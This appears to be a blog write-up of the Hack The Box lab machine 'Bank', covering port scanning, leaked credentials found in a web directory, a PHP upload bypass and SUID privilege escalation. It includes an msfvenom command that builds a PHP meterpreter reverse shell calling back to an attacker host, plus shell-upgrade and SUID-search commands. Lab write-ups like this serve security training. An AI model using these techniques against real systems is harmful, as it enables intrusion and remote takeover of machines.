hackthebox – Bank

nmap

nmap -sS -sV -p- -oN bank.txt 10.10.10.29

The result as follows:

Nmap scan report for 10.10.10.29
 Host is up (0.0049s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Fri Dec  4 12:31:15 2020 -- 1 IP address (1 host up) scanned in 18.56 seconds

Looking clues of the foothold

Using the ip address only the apache intro page is present.

From the nmap result there is a dns port, by verifying with nslookup I confirmed bank.htb is the fqdn of 10.10.10.29, this is a guess.

The result of nslookup

On my own attacker’s machine I just need to add the hostname to my /etc/hosts.

By browsing the http://bank.htb with the browser a login page is presented.

The actual page of bank.htb.

Using dirbuster with 50 threads after some time a /balance-transfer was found.

The directory listing takes quite sometime.

By browsing the /balance-transfer a list of files, the size of each file is between 583 and 584 bytes, until one file that has 257 bytes found.

The only file that has much smaller file size than the rest.
The login portal username and password found.

Get the foothold

This is the transaction portal of chris

On support page, I inspected the “Choose file…” element and found an interesting comment which says I can use htb as the extension for php.

The comment suggests htb can be used for php.

My next step is to generate a php file and named as bank.htb then upload this php file by submitting a support ticket.

I can use the pentester monkey’s reverse php script or make one with msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f raw > bank.htb

Before I upload the bank.htb I will set up a meterpreter server to listen for the connection.

Setup the multi handler and wait for connection.
Upload successful.
To execute the php I simply click on the “Click Here” link.
Meterpreter got a connection.

Promote to a partial-interactive shell

python3 -c "import pty;pty.spawn('/bin/sh')"
Promote a non-interactive shell to a partial one.

Get the user flag

The user.txt file in /home/chris can be read by any one the chmod is 444.

Obtained the user flag

Get the root

find / -perm -u=s -type f 2>/dev/null

The result has an unusual file that looked interesting.

/var/htb/bin/emergency looked interesting

This emergency program has a suid set which means I can run this program like the owner of the file and the owner is root, but i am not sure what this does, by moving up a level of the current directory there is a python2 script which has the same name.

So emergency program is to escalate to root

So it is clear that emergency is a privesc tool, I can either run this script or run the emergency directly both works the same.

Privesc by running the program
Run the python2 script which is a wrapper for the emergency program

Reference: SUID risk

To understand about the risk of SUID click here.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s